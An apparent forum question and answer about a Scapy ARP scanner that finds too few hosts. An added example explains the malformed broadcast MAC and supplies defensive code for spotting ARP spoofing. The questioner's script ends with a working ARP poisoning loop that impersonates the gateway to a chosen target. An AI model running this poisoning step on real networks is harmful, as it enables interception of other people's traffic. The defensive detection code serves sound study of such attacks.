I'm trying to build an ARP scanner script with Scapy. Every time I perform a scan, I don't get the expected result. I get only two responses: one from the gateway and another one from my host machine (I'm performing the scan from a Kali virtual machine). Sometimes, I only get one more response, that's all. But, when I'm doing an ARP discovery with another tool (like Nmap), I get all expected responses (from eight machines). What's wrong in my code, guys? Can you help me? :-(
```python
from scapy.all import *
import os
import sys
from datetime import datetime


def Out():
    print("\nBye!")
    sys.exit(1)


try:
    os.system('clear')
    interface = input("Enter interface : ")
    ips = input("Enter network address : ")
    collection = []
    print("Scanning...")
    start_time = datetime.now()
    conf.verb = 0
    # ARP scanner starts here. The destination MAC needs all six octets:
    # a five-octet string like "FF:FF:FF:FF:FF" is packed into the 6-byte
    # field and padded to ff:ff:ff:ff:ff:00, a unicast address that only
    # hosts in promiscuous mode will even look at.
    ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ips),
                     iface=interface, timeout=2, inter=0.5)
    n = 0
    for snd, rcv in ans:
        result = rcv.sprintf(r"%Ether.src% : %ARP.psrc%")
        collection.append(result)  # append to collection
        print(n, "-", collection[n])
        n = n + 1
    stop_time = datetime.now()
    print("\nScan done in", stop_time - start_time, "seconds.")
    if n > 0:
        target = input("\nPlease enter host to arp poison : ")
        gw_addr = input("Enter the gateway address : ")
        print("\nArp poison on host", target, "starting...\nHit Ctrl + C to Stop.\n")
        p = ARP(pdst=target, psrc=gw_addr)  # arp poison attack starts here
        send(p, inter=RandNum(10, 40), loop=1)
    else:
        Out()
except KeyboardInterrupt:
    Out()
```
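Added example, not part of the question or of Scapy: it shows with plain `struct` why a five-octet destination MAC never reaches every host (a short value is NUL-padded to a unicast address; that Scapy's `MACField` packs the field with the same `6s` format is an assumption about its internals), builds a correct broadcast ARP request by hand so the frame layout is visible, and then does the defender-side work on the `MAC : IP` lines the scanner collects: flagging an IP answered by more than one MAC (the on-wire symptom of ARP spoofing) and MACs missing from a known inventory. The sample results and inventory are constructed.

```python
import socket
import struct
from collections import defaultdict

BROADCAST_MAC = "ff:ff:ff:ff:ff:ff"
ETHERTYPE_ARP = 0x0806


def mac_to_bytes(mac: str) -> bytes:
    """Pack a colon-separated MAC into the 6-byte Ethernet address field.

    struct's '6s' format pads a short value with NUL bytes instead of
    rejecting it, so "FF:FF:FF:FF:FF" (five octets) becomes
    ff:ff:ff:ff:ff:00, which is a unicast address, not broadcast.
    """
    return struct.pack("6s", bytes(int(octet, 16) for octet in mac.split(":")))


def is_broadcast(mac_bytes: bytes) -> bool:
    return mac_bytes == b"\xff" * 6


def build_arp_request(src_mac: str, src_ip: str, target_ip: str,
                      dst_mac: str = BROADCAST_MAC) -> bytes:
    """Ethernet II header + ARP who-has (42 bytes), built by hand."""
    eth = (mac_to_bytes(dst_mac) + mac_to_bytes(src_mac)
           + struct.pack("!H", ETHERTYPE_ARP))
    # htype=1 (Ethernet), ptype=0x0800 (IPv4), hlen=6, plen=4, op=1 (request)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, 1)
    arp += mac_to_bytes(src_mac) + socket.inet_aton(src_ip)
    arp += b"\x00" * 6 + socket.inet_aton(target_ip)  # target MAC unknown
    return eth + arp


def parse_results(lines):
    """Parse the '%Ether.src% : %ARP.psrc%' lines the scanner collects."""
    pairs = []
    for line in lines:
        mac, ip = (part.strip() for part in line.split(" : ", 1))
        pairs.append((mac.lower(), ip))
    return pairs


def find_ip_conflicts(pairs):
    """IPs answered by more than one MAC: what an ARP poisoner looks like."""
    by_ip = defaultdict(set)
    for mac, ip in pairs:
        by_ip[ip].add(mac)
    return {ip: sorted(macs) for ip, macs in by_ip.items() if len(macs) > 1}


def find_unknown_hosts(pairs, inventory):
    """MACs that answered but are not in the expected-device list."""
    return sorted({mac for mac, _ in pairs if mac not in inventory})


# Constructed scan output, in the scanner's own line format.
SAMPLE_RESULTS = [
    "00:0c:29:3a:1b:2c : 192.168.56.1",
    "08:00:27:aa:bb:cc : 192.168.56.1",  # second MAC claiming the gateway IP
    "08:00:27:11:22:33 : 192.168.56.102",
    "52:54:00:de:ad:01 : 192.168.56.150",
]
# Constructed inventory of devices expected on this segment.
KNOWN_INVENTORY = {"00:0c:29:3a:1b:2c", "08:00:27:11:22:33"}

if __name__ == "__main__":
    short = mac_to_bytes("FF:FF:FF:FF:FF")
    print("five-octet MAC packs to", short.hex(":"), "broadcast:", is_broadcast(short))
    frame = build_arp_request("00:11:22:33:44:55", "192.168.56.101", "192.168.56.1")
    print("ARP request:", len(frame), "bytes, dst", frame[:6].hex(":"))
    pairs = parse_results(SAMPLE_RESULTS)
    print("IP conflicts:", find_ip_conflicts(pairs))
    print("unknown hosts:", find_unknown_hosts(pairs, KNOWN_INVENTORY))
```

Only the frame-building part needs a raw socket to actually send; the conflict and inventory checks work on the saved results of any scan, so they can run as a periodic job against the last known-good list rather than once interactively.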
Try to make the tool work infinitely and use that code to re-print the results.
I think that first result gave you only the traffic at that moment, and the infinite loop will monitor all the results.
I hope you find it out ;)